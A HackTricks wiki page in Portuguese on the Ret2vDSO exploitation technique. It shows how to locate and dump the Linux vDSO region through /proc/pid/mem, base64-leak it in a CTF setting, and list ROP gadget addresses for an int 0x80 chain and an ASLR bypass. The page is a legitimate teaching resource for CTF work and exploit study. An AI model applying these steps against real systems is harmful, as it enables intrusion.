Ret2vDSO

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

Informações Básicas

Pode haver gadgets in the vDSO region, que é um pequeno ELF DSO mapeado pelo kernel para fornecer implementações rápidas em user-space de alguns kernel helpers. Nesse tipo de desafio, normalmente uma imagem do kernel é fornecida para fazer o dump da região vDSO.

Localizando a base e os exports do vDSO

O endereço base do vDSO é passado no auxiliary vector como AT_SYSINFO_EHDR, então se você puder ler /proc/<pid>/auxv (ou chamar getauxval em um processo helper), você pode recuperar a base sem depender de um memory leak. See Auxiliary Vector (auxv) and vDSO for practical ways to obtain it.

Uma vez com a base, trate o vDSO como um ELF DSO normal (linux-vdso.so.1): faça o dump do mapeamento e use readelf -Ws/objdump -d (ou o kernel reference parser tools/testing/selftests/vDSO/parse_vdso.c) para resolver símbolos exportados e procurar por gadgets. No x86 32-bit o vDSO comumente exporta __kernel_vsyscall, __kernel_sigreturn, and __kernel_rt_sigreturn; no x86_64 exports típicos incluem __vdso_clock_gettime, __vdso_gettimeofday, and __vdso_time. Como o vDSO usa versionamento de símbolos, combine a versão esperada ao resolver os símbolos.

Seguindo o exemplo de https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/ é possível ver como foi possível fazer o dump da seção vdso e movê-la para o host com:

# Find addresses
cat /proc/76/maps
08048000-08049000 r--p 00000000 00:02 317                                /target
08049000-0804a000 r-xp 00001000 00:02 317                                /target
0804a000-0804b000 rw-p 00002000 00:02 317                                /target
f7ff8000-f7ffc000 r--p 00000000 00:00 0                                  [vvar]
f7ffc000-f7ffe000 r-xp 00000000 00:00 0                                  [vdso]
fffdd000-ffffe000 rw-p 00000000 00:00 0                                  [stack]

# Dump it
dd if=/proc/76/mem of=vdso bs=1 skip=$((0xf7ffc000)) count=$((0x2000))
8192+0 records in
8192+0 records out
8192 bytes (8.0KB) copied, 0.901154 seconds, 8.9KB/s

# Compress and leak it
gzip vdso
base64 vdso.gz

# Decompress and check of gadgets
echo '<base64-payload>' | base64 -d | gzip -d - > vdso
file vdso
ROPgadget --binary vdso | grep 'int 0x80'

ROP gadgets encontrados:

vdso_addr = 0xf7ffc000

int_0x80_xor_eax_eax_ret_addr = 0x8049010
bin_sh_addr = 0x804a800

# 0x0000057a : pop edx ; pop ecx ; ret
pop_edx_pop_ecx_ret_addr = vdso_addr + 0x57a

# 0x00000cca : mov dword ptr [edx], ecx ; add esp, 0x34 ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
mov_dword_ptr_edx_ecx_ret_addr = vdso_addr + 0xcca

# 0x00000ccb : or al, byte ptr [ebx + 0x5e5b34c4] ; pop edi ; pop ebp ; ret
or_al_byte_ptr_ebx_pop_edi_pop_ebp_ret_addr = vdso_addr + 0xccb

# 0x0000015cd : pop ebx ; pop esi ; pop ebp ; ret
pop_ebx_pop_esi_pop_ebp_ret = vdso_addr + 0x15cd

Caution

Observe, portanto, como pode ser possível bypass ASLR abusando do vdso se o kernel for compilado com CONFIG_COMPAT_VDSO, pois o endereço do vdso não será randomizado: https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639

ARM64

Após fazer o dump e verificar a seção vdso de um binário no kali 2023.2 arm64, não encontrei nenhum gadget interessante (sem forma de controlar registradores a partir de valores na stack ou de controlar x30 para um ret) exceto uma forma de chamar um SROP. Veja mais informações no exemplo da página:

SROP - arm64

Referências

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks